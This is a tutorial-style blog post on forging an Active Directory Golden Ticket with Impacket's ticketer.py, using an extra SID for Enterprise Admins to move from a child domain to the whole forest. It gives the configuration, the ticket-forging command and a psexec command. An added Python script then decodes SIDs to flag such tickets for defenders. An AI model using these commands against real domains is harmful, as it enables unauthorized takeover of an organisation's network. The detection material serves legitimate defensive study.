Categories: active directory

🎵 “I’ve Got a Golden Ticket” 🎵

There are a couple of different ways that a Golden Ticket can be created and used when attacking an Active Directory environment. One of them is Impacket's ticketer.py. The nice thing about this script is that it lets you work from a Linux system rather than using Mimikatz on a Windows system to create and pass the ticket.

Setup

The following shows how "Golden Tickets can now be used to compromise any domain in the AD Forest once a single one is compromised." [1] Some details (IP addresses, hashes, SIDs) have been edited due to their sensitive nature.

When using the ticketer.py script, make sure that your /etc/hosts and /etc/krb5.conf files contain the correct names for both domains. For example:

root@eternalnoob:~# cat /etc/hosts
127.0.0.1    localhost
127.0.1.1    kali
10.10.1.5    DEV.TEST.MINE.COM
10.10.1.5    DC01
10.10.2.5    TEST.MINE.COM
10.10.2.5    DC02

and then edit /etc/krb5.conf to include the correct realms:

[realms]
DEV.TEST.MINE.COM = {
    kdc = tcp/DC01:88
}
TEST.MINE.COM = {
    kdc = tcp/DC02:88
}

If the krb5.conf file doesn't exist, the Kerberos client package that provides it may need to be installed:

apt install krb5-user

Usage

Once your configuration is correct and in order, it's time to generate your ticket:

python /opt/impacket/examples/ticketer.py -nthash <krbtgt_hash> -domain-sid <sid_of_domain_you're_in> -domain <fqdn_domain_you're_in> <your_evil_username> -extra-sid <sid_of_domain_you're_going_to>

or something like this:

python /opt/impacket/examples/ticketer.py -nthash 12345678912345678912345678912345 -domain-sid S-1-5-21-1234567890-123456789-1234567890 -domain DEV.TEST.MINE.COM eviladmin -extra-sid S-1-5-21-9876543210-1234567890-9876543210-519

then export the ticket:

export KRB5CCNAME=eviladmin.ccache

and finally use it:

proxychains python /opt/impacket/examples/psexec.py -k -n eviladmin@DC01

Proxychains was used here because the targeted system was only reachable through a pivot. If no proxy is needed, omit proxychains from the command.
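The important detail in the command above, from a defender's point of view, is the -extra-sid value: its domain part belongs to a different domain than the one the ticket is forged for, and its RID (519) is the Enterprise Admins group, which is what turns a child-domain ticket into forest-wide access. The following script, added here as an example and not part of Impacket or of the original post, decodes the SIDs in such a command line (or in any SID-history value) and flags cross-domain and well-known privileged RIDs, so that an analyst reviewing process telemetry or auditing sIDHistory can see at a glance what a ticket would grant. The option names are the ones used on this page; the well-known RID table is standard Windows values; the sample command line is the post's own redacted example.

```python
"""Decode the SIDs in a ticketer.py command line and flag what they grant.

Added example for defenders reviewing captured command lines or SID-history
values. It is not Impacket code and not part of the original post.
"""
import re
import shlex
from typing import Dict, List, NamedTuple, Optional

# Well-known RIDs of built-in high-privilege principals (standard Windows values).
WELL_KNOWN_RIDS = {
    500: "Administrator",
    502: "krbtgt",
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

# The post's own example command (hash and SIDs are its redacted placeholders).
EXAMPLE_CMDLINE = (
    "python /opt/impacket/examples/ticketer.py "
    "-nthash 12345678912345678912345678912345 "
    "-domain-sid S-1-5-21-1234567890-123456789-1234567890 "
    "-domain DEV.TEST.MINE.COM eviladmin "
    "-extra-sid S-1-5-21-9876543210-1234567890-9876543210-519"
)


class ParsedSid(NamedTuple):
    domain: str          # S-1-5-21-a-b-c, the domain identifier authority part
    rid: Optional[int]   # trailing relative identifier, None for a bare domain SID


class Finding(NamedTuple):
    sid: str
    cross_domain: bool       # domain part differs from the ticket's own domain SID
    rid: Optional[int]
    rid_name: Optional[str]  # well-known name if the RID is a privileged built-in


def parse_sid(sid: str) -> ParsedSid:
    """Split an NT domain SID into its domain part and optional RID."""
    m = re.fullmatch(r"(S-1-5-21-\d+-\d+-\d+)(?:-(\d+))?", sid.strip())
    if not m:
        raise ValueError(f"not a domain SID: {sid!r}")
    return ParsedSid(m.group(1), int(m.group(2)) if m.group(2) else None)


def parse_ticketer_cmdline(cmdline: str) -> Dict[str, str]:
    """Collect the single-valued options this review cares about."""
    argv = shlex.split(cmdline)
    wanted = {"-nthash", "-domain", "-domain-sid", "-extra-sid"}
    opts: Dict[str, str] = {}
    i = 0
    while i < len(argv):
        if argv[i] in wanted and i + 1 < len(argv):
            opts[argv[i].lstrip("-")] = argv[i + 1]
            i += 2
        else:
            i += 1
    return opts


def assess_extra_sids(domain_sid: str, extra_sid_arg: str) -> List[Finding]:
    """Compare each extra SID (comma-separated) against the ticket's domain SID."""
    home = parse_sid(domain_sid)
    findings: List[Finding] = []
    for raw in extra_sid_arg.split(","):
        p = parse_sid(raw)
        findings.append(Finding(raw.strip(), p.domain != home.domain,
                                p.rid, WELL_KNOWN_RIDS.get(p.rid)))
    return findings


def review(cmdline: str) -> List[Finding]:
    """Parse a ticketer.py command line and return one finding per extra SID."""
    opts = parse_ticketer_cmdline(cmdline)
    if "domain-sid" not in opts or "extra-sid" not in opts:
        return []
    return assess_extra_sids(opts["domain-sid"], opts["extra-sid"])


if __name__ == "__main__":
    for f in review(EXAMPLE_CMDLINE):
        scope = "CROSS-DOMAIN" if f.cross_domain else "same domain"
        print(f"{f.sid}: {scope}, RID {f.rid} ({f.rid_name or 'not well-known'})")
```

The same `assess_extra_sids` check applies to sIDHistory values read from a directory audit: a child-domain principal carrying the parent domain's RID 519 in its SID history is exactly the condition that SID filtering on the trust is meant to block, and is worth alerting on regardless of how the value got there.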

Resources

  • https://artkond.com/2016/12/18/pivoting-kerberos/
  • https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/
  • http://www.harmj0y.net/blog/redteaming/the-trustpocalypse/